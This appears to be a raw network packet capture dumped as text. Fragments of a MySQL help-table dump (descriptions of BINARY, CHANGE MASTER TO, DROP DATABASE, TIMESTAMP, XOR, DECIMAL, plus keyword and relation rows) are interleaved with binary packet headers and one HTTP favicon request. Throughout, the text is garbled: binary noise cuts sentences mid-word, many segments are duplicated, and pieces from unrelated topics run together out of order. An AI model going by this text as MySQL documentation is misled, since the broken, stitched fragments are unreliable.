-> NULL',''),(233,'BINARY OPERATOR',23,' BINARY\nThe BINARY operator casts the string following it to a binary string.\nThis is an easy way to force a column comparison to be done byte by byte\nrather than character by character. This causes the comparison to be\ncase sensitive even\nif the column isn\'t defined as BINARY or BLOB.\nBINARY also causes trailing spaces to be significant.\n','mysql> SELECT \'a\' = \'A\';\n -> 1\nmysql> SELECT BINARY \'a\' = \'A\';\n -> 0\nmysql> SELECT \'a\' = \'a \';\n -> 1\nmysql> SELECT BINARY \'a\' = \'a \';\n CZZBi0`EL@/Ao0E4#v@?s  P:ԙc!`$ d' SELECT OCT(12);\n -> \'14\'',''),(230,'SYSDATE',14,' SYSDATE()\n\nSYSDATE() is a synonym for NOW().\n','',''),(231,'ASBINARY',13,' AsBinary(g)\nConverts a value in internal geometry format to its WKB representation\nand returns the binary result.\n','SELECT AsBinary(g) FROM geom;',''),(232,'MAKEDATE',14,' MAKEDATE(year,dayofyear)\n\nReturns a date, given year and day-of-year values.\ndayofyear must be greater than 0 or the result is NULL.\n','mysql> SELECT MAKEDATE(2001,31), MAKEDATE(2001,32);\n -> \'2001-01-31\', \'2001-02-01\'\nmysql> SELECT MAKEDATE(2001,365), MAKEDATE(2004,365);\n -> \'2001-12-31\', \'2004-12-30\'\nmysql> SELECT MAKEDATE(2001,0);\n -> NULL',''),(233,'BINARY OPERATOR',23,' BINARY\nThe BINARY operator casts the string following it to a binary string.\nThis is an easy way to force a column comparison to be done byte by byte\nrather than character by character. This causes the comparison to be\ncase sensitive even\nif the column isn\'t defined as BINARY or BLOB.\nBINARY also causes trailing spaces to be significant.\n','mysql> SELECT \'a\' = \'A\';\n -> 1\nmysql> SELECT BINARY \'a\' = \'A\';\n -> 0\nmysql> SELECT \'a\' = \'a \';\n -> 1\nmysql> SELECT BINARY \'a\' = \'a \';\n CZZ0`BiEL@/܀o0SE4#v@@s  P:ԙc!`$ d' STOP SLAVE; -- if replication was running\nmysql> CHANGE MASTER TO MASTER_PASSWORD=\'new3cret\';\nmysql> START SLAVE; -- if you want to restart replication\n\nThere is no need to specify the parameters that do\nnot change (host, port, user, and so forth).\n\nMASTER_HOST and MASTER_PORT are the hostname (or IP address) of\nthe master host and its TCP/IP port. Note that if MASTER_HOST is\nequal to localhost, then, like in other parts of MySQL, the port\nmay be ignored (if Unix socket files can be used, for example).\n\nIf you specify MASTER_HOST or MASTER_PORT,\nthe slave assumes that the master server is different than\nbefore (even if you specify a host or port value that is\nthe same as the current value.) In this case, the old values for the master\nbinary log name and position are considered no longer applicable, so if you\ndo not specify MASTER_LOG_FILE and MASTER_LOG_POS in the\nstatement, MASTER_LOG_FILE=\'\' and MASTER_LOG_POS=4 are\nsilently appended to it.\n\nMASTER_LOG_FILE and MASTER_LOG_POS are the Cbb0`BiET@/Ԁo0SE<*@@  3P컩b  ) a given parameter, it keeps its old\nvalue, except as indicated in the following discussion. For example, if the password to connect to your MySQL master has\nchanged, you just need to issue these statements\nto tell the slave about the new password:\n\nmysql> STOP SLAVE; -- if replication was running\nmysql> CHANGE MASTER TO MASTER_PASSWORD=\'new3cret\';\nmysql> START SLAVE; -- if you want to restart replication\n\nThere is no need to specify the parameters that do\nnot change (host, port, user, and so forth).\n\nMASTER_HOST and MASTER_PORT are the hostname (or IP address) of\nthe master host and its TCP/IP port. Note that if MASTER_HOST is\nequal to localhost, then, like in other parts of MySQL, the port\nmay be ignored (if Unix socket files can be used, for example).\n\nIf you specify MASTER_HOST or MASTER_PORT,\nthe slave assumes that the master server is different than\nbefore (even if you specify a host or port value that is\nthe same as the current value.) In this case, the old values for the master\nbinary log name and position are considered no longer applicable, so if you\ndo not specify MASTER_LOG_FILE and MASTER_LOG_POS in the\nstatement, MASTER_LOG_FILE=\'\' and MASTER_LOG_POS=4 are\nsilently appended to it.\n\nMASTER_LOG_FILE and MASTER_LOG_POS are the C`bbBi0`ET@/˃2o0E CHANGE MASTER TO\n -> MASTER_HOST=\'master2.mycompany.com\',\n -> MASTER_USER=\'replication\',\n -> MASTER_PASSWORD=\'bigs3cret\',\n -> MASTER_PORT=3306,\n -> MASTER_LOG_FILE=\'master2-bin.001\',\n -> MASTER_LOG_POS=4,\n -> MASTER_CONNECT_RETRY=10;\n\nmysql> CHANGE MASTER TO\n -> RELAY_LOG_FILE=\'slave-relay-bin.006\',\n -> RELAY_LOG_POS=4025;\n','',''),(149,'DROP DATABASE',28,'DROP DATABASE drops all tables in the database and deletes the\ndatabase. Be /very/ careful with this statement!\nTo use DROP DATABASE, you need the DROP privilege on the\ndatabase.\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring if the database doesn\'t exist.\n\nDROP SCHEMA can be used as of MySQL 5.0.2.\n','DROP {DATABASE | SCHEMA} [IF EXISTS] db_name',''),(150,'TIMESTAMP FUNCTION',14,' TIMESTAMP(expr)\n TIMESTAMP(expr,expr2)\n\nWith one argument, returns the date or datetime expression expr\nas a datetime value.\nWith two arguments, adds the time exprCJbb0`BiET@/Ԁo0SE<*@@  3P컳b * )og and the offset\ncorresponding to it. After loading the snapshot into the slave, you\ncan run CHANGE MASTER TO MASTER_LOG_FILE=\'log_name_on_master\',\nMASTER_LOG_POS=log_offset_on_master on the slave.\n\nExamples:\n\nmysql> CHANGE MASTER TO\n -> MASTER_HOST=\'master2.mycompany.com\',\n -> MASTER_USER=\'replication\',\n -> MASTER_PASSWORD=\'bigs3cret\',\n -> MASTER_PORT=3306,\n -> MASTER_LOG_FILE=\'master2-bin.001\',\n -> MASTER_LOG_POS=4,\n -> MASTER_CONNECT_RETRY=10;\n\nmysql> CHANGE MASTER TO\n -> RELAY_LOG_FILE=\'slave-relay-bin.006\',\n -> RELAY_LOG_POS=4025;\n','',''),(149,'DROP DATABASE',28,'DROP DATABASE drops all tables in the database and deletes the\ndatabase. Be /very/ careful with this statement!\nTo use DROP DATABASE, you need the DROP privilege on the\ndatabase.\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring if the database doesn\'t exist.\n\nDROP SCHEMA can be used as of MySQL 5.0.2.\n','DROP {DATABASE | SCHEMA} [IF EXISTS] db_name',''),(150,'TIMESTAMP FUNCTION',14,' TIMESTAMP(expr)\n TIMESTAMP(expr,expr2)\n\nWith one argument, returns the date or datetime expression expr\nas a datetime value.\nWith two arguments, adds the time exprC#bbBi0`ET@/˃2o0E<1@?"  P֞%g  mRcUR'),(275,'REFERENCES'),(276,'AES_ENCRYPT'),(277,'ISOLATION'),(278,'INT8'),(279,'RESTRICT'),(280,'IS'),(281,'UNCOMMITTED'),(282,'NOT'),(283,'DES_KEY_FILE'),(284,'COMPRESSED'),(285,'START'),(286,'IF'),(287,'SAVEPOINT'),(288,'PRIMARY'),(289,'LAST'),(290,'INNOBASE'),(291,'LIMIT'),(292,'KEYS'),(293,'KEY'),(294,'MERGE'),(295,'SQL_NO_CACHE'),(296,'DELAYED'),(297,'CONSTRAINT'),(298,'SERIAL'),(299,'ACTION'),(300,'WRITE'),(301,'SESSION'),(302,'DATABASE'),(303,'NULL'),(304,'USE_FRM'),(305,'SLAVE'),(306,'TERMINATED'),(307,'ASC'),(308,'OPTIONALLY'),(309,'ENABLE'),(310,'DIRECTORY'),(311,'LOCAL'),(312,'DISTINCT'),(313,'MASTER_SSL_KEY'),(314,'TABLES'),(315,'<>'),(316,'HIGH_PRIORITY'),(317,'BTREE'),(318,'FIRST'),(319,'TYPES'),(320,'MASTER'),(321,'FIXED'),(322,'RAID0'),(323,'MULTIPOLYGONFROMTEXT'),(324,'ROW_FORMAT'); 1681 UNLOCK TABLES; /*!40000 ALTER TABLE `help_keyword` ENABLE KEYS */; -- -- Table structure for table `help_relation` -- DROP TABLE IF EXISTS `help_relation`; CREATE TABLE `help_relation` ( `help_topic_id` int(10) unsigned NOT NULL default '0', `help_keyword_id` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`help_keyword_id`,`help_topic_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='keyword-topic relation'; -- -- Dumping data for table `help_relatC-ZZBi0`EL@/Ao0E4#z@?o  P:ԙ!` d''),(316,'HIGH_PRIORITY'),(317,'BTREE'),(318,'FIRST'),(319,'TYPES'),(320,'MASTER'),(321,'FIXED'),(322,'RAID0'),(323,'MULTIPOLYGONFROMTEXT'),(324,'ROW_FORMAT'); 1681 UNLOCK TABLES; /*!40000 ALTER TABLE `help_keyword` ENABLE KEYS */; -- -- Table structure for table `help_relation` -- DROP TABLE IF EXISTS `help_relation`; CREATE TABLE `help_relation` ( `help_topic_id` int(10) unsigned NOT NULL default '0', `help_keyword_id` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`help_keyword_id`,`help_topic_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='keyword-topic relation'; -- -- Dumping data for table `help_relatCVZZ0`BiEL@/܀o0SE4#z@@o  P:ԙ!` d' SELECT TIMESTAMP(\'2003-12-31\');\n -> \'2003-12-31 00:00:00\'\nmysql> SELECT TIMESTAMP(\'2003-12-31 12:00:00\',\'12:00:00\');\n -> \'2004-01-01 00:00:00\'',''),(151,'CHARACTER_LENGTH',23,' CHARACTER_LENGTH(str)\n\nCHARACTER_LENGTH() is a synonym for CHAR_LENGTH().\n','',''),(152,'CREATE VIEW ALGORITHM MERGE TEMPTABLE WITH CHECK OPTION',24,'','CREATE [OR REPLACE] [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(153,'TIMESTAMPDIFF FUNCTION',14,'','mysql> SELECT TIMESTAMPDIFF(MONTH,\'2003-02-01\',\'2003-05-01\');\n -> 3\nmysql> SELECT TIMESTAMPDIFF(YEAR,\'2002-05-01\',\'2001-01-01\');\n -> -1',''),(154,'CRC32',4,' CRC32(expr)\nComputes a cyclic redundancy check value and returns a 32-bit unsigned value.\nThe result is NULL if the argument is NULL.\nThe argument is expected be a string and is treated as one if it is not.\n','mysql> SELECT CRC32(\'MySQL\');\n -> 3259397556',''),(155,'XOR',20,' XOR\nLogical XOR.\nReturns NULL if either operand is NULL.\nFor non-NULL operands, evaluates to 1 if an odd number\nof operands is non-zero,Cbb0`BiET@/Ԁo0SE<*@@  3P컸b Q )ession expr2 to the\ndate or datetime expression expr and returns a datetime value.\n','mysql> SELECT TIMESTAMP(\'2003-12-31\');\n -> \'2003-12-31 00:00:00\'\nmysql> SELECT TIMESTAMP(\'2003-12-31 12:00:00\',\'12:00:00\');\n -> \'2004-01-01 00:00:00\'',''),(151,'CHARACTER_LENGTH',23,' CHARACTER_LENGTH(str)\n\nCHARACTER_LENGTH() is a synonym for CHAR_LENGTH().\n','',''),(152,'CREATE VIEW ALGORITHM MERGE TEMPTABLE WITH CHECK OPTION',24,'','CREATE [OR REPLACE] [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(153,'TIMESTAMPDIFF FUNCTION',14,'','mysql> SELECT TIMESTAMPDIFF(MONTH,\'2003-02-01\',\'2003-05-01\');\n -> 3\nmysql> SELECT TIMESTAMPDIFF(YEAR,\'2002-05-01\',\'2001-01-01\');\n -> -1',''),(154,'CRC32',4,' CRC32(expr)\nComputes a cyclic redundancy check value and returns a 32-bit unsigned value.\nThe result is NULL if the argument is NULL.\nThe argument is expected be a string and is treated as one if it is not.\n','mysql> SELECT CRC32(\'MySQL\');\n -> 3259397556',''),(155,'XOR',20,' XOR\nLogical XOR.\nReturns NULL if either operand is NULL.\nFor non-NULL operands, evaluates to 1 if an odd number\nof operands is non-zero,C bbBi0`ET@/˃2o0E<2@?"  P֞%g I mRcion` -- /*!40000 ALTER TABLE `help_relation` DISABLE KEYS */; LOCK TABLES `help_relation` WRITE; INSERT INTO `help_relation` VALUES (379,0),(281,1),(351,2),(331,3),(127,4),(148,5),(337,6),(272,7),(109,8),(299,9),(62,10),(281,10),(78,11),(272,11),(127,12),(396,12),(302,13),(190,14),(80,15),(19,16),(61,16),(127,16),(149,16),(219,16),(368,16),(281,17),(186,18),(20,19),(397,20),(117,21),(40,22),(23,23),(272,24),(371,24),(20,25),(23,26),(281,26),(371,27),(371,28),(272,29),(371,29),(396,30),(34,31),(60,31),(281,31),(287,31),(331,31),(368,31),(371,31),(371,32),(375,32),(20,33),(87,34),(331,34),(371,34),(20,35),(371,36),(281,37),(127,38),(247,38),(287,39),(371,40),(375,40),(0,41),(375,41),(24,42),(78,43),(0,44),(34,45),(60,45),(78,45),(166,46),(368,46),(281,47),(0,48),(60,48),(117,48),(281,48),(331,48),(368,48),(24,49),(34,49),(265,49),(299,50),(305,51),(64,52),(371,53),(351,54),(0,55),(204,56),(236,56),(299,56),(337,56),(148,57),(363,57),(148,58),(368,58),(20,59),(117,60),(281,60),(375,60),(30,61),(117,61),(281,61),(371,62),(204,63),(20,64),(96,65),(109,66),(363,66),(379,67),(166,68),(281,69),(70,70),(150,70),(331,71),(62,72),(371,73),(117,74),(387,74),(340,75),(226,76),(104,77),(272,78),(20,79),(19,80),(119,80),(149,80),(219,80),(15,81),(62,81),(117,82),(190,82),(368,82),C%bb0`BiET@/o0AE<2@@!  P֞%g I mRcion` -- /*!40000 ALTER TABLE `help_relation` DISABLE KEYS */; LOCK TABLES `help_relation` WRITE; INSERT INTO `help_relation` VALUES (379,0),(281,1),(351,2),(331,3),(127,4),(148,5),(337,6),(272,7),(109,8),(299,9),(62,10),(281,10),(78,11),(272,11),(127,12),(396,12),(302,13),(190,14),(80,15),(19,16),(61,16),(127,16),(149,16),(219,16),(368,16),(281,17),(186,18),(20,19),(397,20),(117,21),(40,22),(23,23),(272,24),(371,24),(20,25),(23,26),(281,26),(371,27),(371,28),(272,29),(371,29),(396,30),(34,31),(60,31),(281,31),(287,31),(331,31),(368,31),(371,31),(371,32),(375,32),(20,33),(87,34),(331,34),(371,34),(20,35),(371,36),(281,37),(127,38),(247,38),(287,39),(371,40),(375,40),(0,41),(375,41),(24,42),(78,43),(0,44),(34,45),(60,45),(78,45),(166,46),(368,46),(281,47),(0,48),(60,48),(117,48),(281,48),(331,48),(368,48),(24,49),(34,49),(265,49),(299,50),(305,51),(64,52),(371,53),(351,54),(0,55),(204,56),(236,56),(299,56),(337,56),(148,57),(363,57),(148,58),(368,58),(20,59),(117,60),(281,60),(375,60),(30,61),(117,61),(281,61),(371,62),(204,63),(20,64),(96,65),(109,66),(363,66),(379,67),(166,68),(281,69),(70,70),(150,70),(331,71),(62,72),(371,73),(117,74),(387,74),(340,75),(226,76),(104,77),(272,78),(20,79),(19,80),(119,80),(149,80),(219,80),(15,81),(62,81),(117,82),(190,82),(368,82),CZZBi0`EL@/Ao0E4@?H  PPZշ"lm& d^fCZZ0`BiEL@/o0  E4@@G  PPZշ"lm& d^fCtbbBi0`ET@/p܂Ao0E<*@?  3P컽b 9 )\notherwise 0 is returned.\n','mysql> SELECT 1 XOR 1;\n -> 0\nmysql> SELECT 1 XOR 0;\n -> 1\nmysql> SELECT 1 XOR NULL;\n -> NULL\nmysql> SELECT 1 XOR 1 XOR 1;\n -> 1',''),(156,'STARTPOINT',18,' StartPoint(ls)\nReturns the Point that is the start point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(StartPoint(GeomFromText(@ls)));\n+---------------------------------------+\n| AsText(StartPoint(GeomFromText(@ls))) |\n+---------------------------------------+\n| POINT(1 1) |\n+---------------------------------------+',''),(157,'MPOLYFROMTEXT',3,' MPolyFromText(wkt[,srid])\n MultiPolygonFromText(wkt[,srid])\nConstructs a MULTIPOLYGON value using its WKT representation and SRID.\n','',''),(158,'MBRINTERSECTS',8,' MBRIntersects(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 intersect.\n','',''),(159,'BIT_OR',12,' BIT_OR(expr)\nReturns the bitwise OR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(160,'YEARWEEK',14,' YEARWEEK(date)\n YEARWEEK(date,start)\nReturns year and week for a date. The start argument works exactly\nlike the start argumC}ZZBiBaEL@/fo0 o0E4@)m Y P+$l-/̾ G4W7=wCbb0`BiET@/Ԁo0SE<*@@  3P컽b 9 )\notherwise 0 is returned.\n','mysql> SELECT 1 XOR 1;\n -> 0\nmysql> SELECT 1 XOR 0;\n -> 1\nmysql> SELECT 1 XOR NULL;\n -> NULL\nmysql> SELECT 1 XOR 1 XOR 1;\n -> 1',''),(156,'STARTPOINT',18,' StartPoint(ls)\nReturns the Point that is the start point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(StartPoint(GeomFromText(@ls)));\n+---------------------------------------+\n| AsText(StartPoint(GeomFromText(@ls))) |\n+---------------------------------------+\n| POINT(1 1) |\n+---------------------------------------+',''),(157,'MPOLYFROMTEXT',3,' MPolyFromText(wkt[,srid])\n MultiPolygonFromText(wkt[,srid])\nConstructs a MULTIPOLYGON value using its WKT representation and SRID.\n','',''),(158,'MBRINTERSECTS',8,' MBRIntersects(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 intersect.\n','',''),(159,'BIT_OR',12,' BIT_OR(expr)\nReturns the bitwise OR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(160,'YEARWEEK',14,' YEARWEEK(date)\n YEARWEEK(date,start)\nReturns year and week for a date. The start argument works exactly\nlike the start argumCZZʪBiEL@/o0o0oE4@@m Y P+$l-/̾ G4W7=wCbbBi0`ET@/˃2o0E<3@?"  P֞%g 2N mRc(371,82),(137,83),(368,84),(371,84),(259,85),(265,85),(374,85),(25,86),(114,86),(209,86),(174,87),(30,88),(60,88),(109,88),(145,88),(167,88),(368,88),(375,88),(391,88),(20,89),(97,89),(208,89),(299,89),(41,90),(176,90),(272,90),(291,90),(166,91),(368,91),(371,91),(371,92),(148,93),(0,94),(37,95),(148,96),(371,97),(247,98),(359,99),(226,100),(104,101),(37,102),(258,102),(34,103),(87,103),(186,103),(272,103),(281,103),(286,103),(359,103),(23,104),(78,104),(351,104),(0,105),(20,106),(371,107),(164,108),(272,109),(281,109),(272,110),(371,111),(127,112),(127,113),(331,114),(127,115),(272,116),(331,116),(199,117),(371,118),(368,119),(371,119),(43,120),(368,120),(131,121),(371,122),(19,123),(122,123),(351,124),(331,125),(34,126),(60,126),(281,126),(287,126),(368,126),(0,127),(34,127),(199,128),(15,129),(94,129),(131,129),(164,129),(247,129),(299,129),(396,129),(326,130),(272,131),(368,132),(371,132),(375,132),(114,133),(108,134),(272,134),(109,135),(272,136),(359,137),(87,138),(286,138),(331,138),(281,139),(299,140),(371,141),(314,142),(369,143),(355,144),(96,145),(145,145),(351,145),(371,146),(104,147),(281,148),(0,149),(23,149),(281,149),(331,150),(109,151),(272,152),(0,153),(174,154),(368,155),(323,156),(368,157),(331,158),(371,158),(281,159),(23,160),(30,160),(34,160),(6Cbb0`BiET@/o0AE<3@@!  P֞%g 2N mRc(371,82),(137,83),(368,84),(371,84),(259,85),(265,85),(374,85),(25,86),(114,86),(209,86),(174,87),(30,88),(60,88),(109,88),(145,88),(167,88),(368,88),(375,88),(391,88),(20,89),(97,89),(208,89),(299,89),(41,90),(176,90),(272,90),(291,90),(166,91),(368,91),(371,91),(371,92),(148,93),(0,94),(37,95),(148,96),(371,97),(247,98),(359,99),(226,100),(104,101),(37,102),(258,102),(34,103),(87,103),(186,103),(272,103),(281,103),(286,103),(359,103),(23,104),(78,104),(351,104),(0,105),(20,106),(371,107),(164,108),(272,109),(281,109),(272,110),(371,111),(127,112),(127,113),(331,114),(127,115),(272,116),(331,116),(199,117),(371,118),(368,119),(371,119),(43,120),(368,120),(131,121),(371,122),(19,123),(122,123),(351,124),(331,125),(34,126),(60,126),(281,126),(287,126),(368,126),(0,127),(34,127),(199,128),(15,129),(94,129),(131,129),(164,129),(247,129),(299,129),(396,129),(326,130),(272,131),(368,132),(371,132),(375,132),(114,133),(108,134),(272,134),(109,135),(272,136),(359,137),(87,138),(286,138),(331,138),(281,139),(299,140),(371,141),(314,142),(369,143),(355,144),(96,145),(145,145),(351,145),(371,146),(104,147),(281,148),(0,149),(23,149),(281,149),(331,150),(109,151),(272,152),(0,153),(174,154),(368,155),(323,156),(368,157),(331,158),(371,158),(281,159),(23,160),(30,160),(34,160),(6CZZBiʪEL@/o0oo0E4@@ YP-/+$mW 7=wG4WCZZBaBiEL@/fo0o0 E4@@ YP-/+$mW 7=wG4WCbbBi0`ET@/p܂Ao0E<*@?  3Pºb o )ent to WEEK(). The year in the\nresult may be\ndifferent from the year in the date argument for the first and the last\nweek of the year.\n','mysql> SELECT YEARWEEK(\'1987-01-01\');\n -> 198653',''),(161,'NOT BETWEEN',26,' expr NOT BETWEEN min AND max\nThis is the same as NOT (expr BETWEEN min AND max).\n','',''),(162,'LOG10',4,' LOG10(X)\nReturns the base-10 logarithm of X.\n','mysql> SELECT LOG10(2);\n -> 0.301030\nmysql> SELECT LOG10(100);\n -> 2.000000\nmysql> SELECT LOG10(-100);\n -> NULL',''),(163,'SQRT',4,' SQRT(X)\nReturns the non-negative square root of X.\n','mysql> SELECT SQRT(4);\n -> 2.000000\nmysql> SELECT SQRT(20);\n -> 4.472136',''),(164,'DECIMAL',1,' DECIMAL[(M[,D])] [UNSIGNED] [ZEROFILL]\n\n\nFor MySQL 5.0.3 and above:\n\nA packed ``exact\'\' fixed-point number. M is the total number of\ndigits and D is the number of decimals. The decimal point and\n(for negative numbers) the \'-\' sign are not counted in M.\nIf D is 0, values have no\ndecimal point or fractional part. The maximum number of digits\n(M) for DECIMAL is 64. The maximum number of supported\ndecimals (D) is 30. If UNSIGNED is specified, negative\nvalues are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefaulCBi0`E@/OQlo0Eu?@` k  P-F0jPKoIGET /favicon.ico HTTP/1.1 Host: 10.5.1.3 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 (ax) Accept: image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 ---------------: ------------ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cbb0`BiET@/Ԁo0SE<*@@  3Pºb o )ent to WEEK(). The year in the\nresult may be\ndifferent from the year in the date argument for the first and the last\nweek of the year.\n','mysql> SELECT YEARWEEK(\'1987-01-01\');\n -> 198653',''),(161,'NOT BETWEEN',26,' expr NOT BETWEEN min AND max\nThis is the same as NOT (expr BETWEEN min AND max).\n','',''),(162,'LOG10',4,' LOG10(X)\nReturns the base-10 logarithm of X.\n','mysql> SELECT LOG10(2);\n -> 0.301030\nmysql> SELECT LOG10(100);\n -> 2.000000\nmysql> SELECT LOG10(-100);\n -> NULL',''),(163,'SQRT',4,' SQRT(X)\nReturns the non-negative square root of X.\n','mysql> SELECT SQRT(4);\n -> 2.000000\nmysql> SELECT SQRT(20);\n -> 4.472136',''),(164,'DECIMAL',1,' DECIMAL[(M[,D])] [UNSIGNED] [ZEROFILL]\n\n\nFor MySQL 5.0.3 and above:\n\nA packed ``exact\'\' fixed-point number. M is the total number of\ndigits and D is the number of decimals. The decimal point and\n(for negative numbers) the \'-\' sign are not counted in M.\nIf D is 0, values have no\ndecimal point or fractional part. The maximum number of digits\n(M) for DECIMAL is 64. The maximum number of supported\ndecimals (D) is 30. If UNSIGNED is specified, negative\nvalues are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefaulC0`BiE@/Vo0Eu?@@ k  P-F0jPKoIGET /favicon.ico HTTP/1.1 Host: 10.5.1.3 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 (ax) Accept: image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 ---------------: ------------ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive CbbBi0`ET@/˃2o0E<4@?"  P֞%g q mUc0,160),(117,160),(331,160),(371,161),(119,162),(149,162),(167,162),(272,162),(127,163),(384,164),(367,165),(0,166),(43,166),(61,166),(166,166),(272,166),(368,166),(371,166),(334,167),(283,168),(215,169),(24,170),(265,170),(0,171),(204,172),(337,172),(281,173),(15,174),(94,174),(131,174),(164,174),(247,174),(396,174),(148,175),(148,176),(305,177),(167,178),(204,178),(337,178),(148,179),(272,180),(291,180),(368,180),(371,180),(24,181),(43,181),(118,181),(219,181),(265,181),(272,181),(283,181),(286,181),(374,181),(371,182),(19,183),(219,183),(371,183),(375,183),(148,184),(281,185),(371,186),(368,187),(62,188),(148,189),(260,190),(281,190),(287,190),(281,191),(248,192),(298,192),(299,192),(164,193),(194,194),(371,195),(114,196),(43,197),(119,197),(127,197),(166,197),(272,197),(371,197),(371,198),(182,199),(272,200),(236,201),(272,201),(291,201),(371,202),(300,203),(110,204),(79,205),(371,206),(30,207),(24,208),(204,209),(41,210),(108,210),(176,210),(186,210),(236,210),(291,210),(241,211),(281,211),(371,212),(259,213),(371,214),(186,215),(104,216),(20,217),(110,218),(249,218),(247,219),(78,220),(20,221),(30,222),(203,222),(272,223),(103,224),(148,225),(145,226),(359,227),(15,228),(82,228),(20,229),(148,230),(331,231),(368,232),(148,233),(20,234),(272,235),(300,235),(62,236Cbb0`BiET@/o0AE<4@@!  P֞%g q mUc0,160),(117,160),(331,160),(371,161),(119,162),(149,162),(167,162),(272,162),(127,163),(384,164),(367,165),(0,166),(43,166),(61,166),(166,166),(272,166),(368,166),(371,166),(334,167),(283,168),(215,169),(24,170),(265,170),(0,171),(204,172),(337,172),(281,173),(15,174),(94,174),(131,174),(164,174),(247,174),(396,174),(148,175),(148,176),(305,177),(167,178),(204,178),(337,178),(148,179),(272,180),(291,180),(368,180),(371,180),(24,181),(43,181),(118,181),(219,181),(265,181),(272,181),(283,181),(286,181),(374,181),(371,182),(19,183),(219,183),(371,183),(375,183),(148,184),(281,185),(371,186),(368,187),(62,188),(148,189),(260,190),(281,190),(287,190),(281,191),(248,192),(298,192),(299,192),(164,193),(194,194),(371,195),(114,196),(43,197),(119,197),(127,197),(166,197),(272,197),(371,197),(371,198),(182,199),(272,200),(236,201),(272,201),(291,201),(371,202),(300,203),(110,204),(79,205),(371,206),(30,207),(24,208),(204,209),(41,210),(108,210),(176,210),(186,210),(236,210),(291,210),(241,211),(281,211),(371,212),(259,213),(371,214),(186,215),(104,216),(20,217),(110,218),(249,218),(247,219),(78,220),(20,221),(30,222),(203,222),(272,223),(103,224),(148,225),(145,226),(359,227),(15,228),(82,228),(20,229),(148,230),(331,231),(368,232),(148,233),(20,234),(272,235),(300,235),(62,236C8bbBi0`ET@/p܂Ao0E<*@?  3PŸb  )t is 10.\n\nAll basic calculations (+, -, *, /) with DECIMAL columns are\ndone with a precision of 64 decimal digits.\n\nBefore MySQL 5.0.3:\n\nAn unpacked fixed-point number. Behaves like a CHAR column;\n``unpacked\'\' means the number is stored as a string, using one character for\neach digit of the value. M is the total number of digits and\nD is the number of decimals. The decimal point and (for negative\nnumbers) the \'-\' sign are not counted in M, although space for\nthem is reserved. If D is 0, values have no decimal point or\nfractional part. The maximum range of DECIMAL values is the same as\nfor DOUBLE, but the actual range for a given DECIMAL column\nmay be constrained by the choice of M and D. If\nUNSIGNED is specified, negative values are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefault is 10.\n\nBefore MySQL 3.23:\n\nAs just described, with the exception that the M value must be large\nenough to include the space needed for the sign and the decimal point\ncharacters.\n\n DEC[(M[,D])] [UNSIGNED] [ZEROFILL]\n NUMERIC[(M[,D])] [UNSIGNED] [ZEROFILL]\n FIXED[(M[,D])] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DECIMAL. The FIXED synonym was added\nin MySQL 4.1.0 for compatibility with other servers.\n','',''),(CTbb0`BiET@/Ԁo0SE<*@@  3PŸb  )t is 10.\n\nAll basic calculations (+, -, *, /) with DECIMAL columns are\ndone with a precision of 64 decimal digits.\n\nBefore MySQL 5.0.3:\n\nAn unpacked fixed-point number. Behaves like a CHAR column;\n``unpacked\'\' means the number is stored as a string, using one character for\neach digit of the value. M is the total number of digits and\nD is the number of decimals. The decimal point and (for negative\nnumbers) the \'-\' sign are not counted in M, although space for\nthem is reserved. If D is 0, values have no decimal point or\nfractional part. The maximum range of DECIMAL values is the same as\nfor DOUBLE, but the actual range for a given DECIMAL column\nmay be constrained by the choice of M and D. If\nUNSIGNED is specified, negative values are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefault is 10.\n\nBefore MySQL 3.23:\n\nAs just described, with the exception that the M value must be large\nenough to include the space needed for the sign and the decimal point\ncharacters.\n\n DEC[(M[,D])] [UNSIGNED] [ZEROFILL]\n NUMERIC[(M[,D])] [UNSIGNED] [ZEROFILL]\n FIXED[(M[,D])] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DECIMAL. The FIXED synonym was added\nin MySQL 4.1.0 for compatibility with other servers.\n','',''),(CbbBi0`ET@/˃2o0E<5@?"  P֞%g q 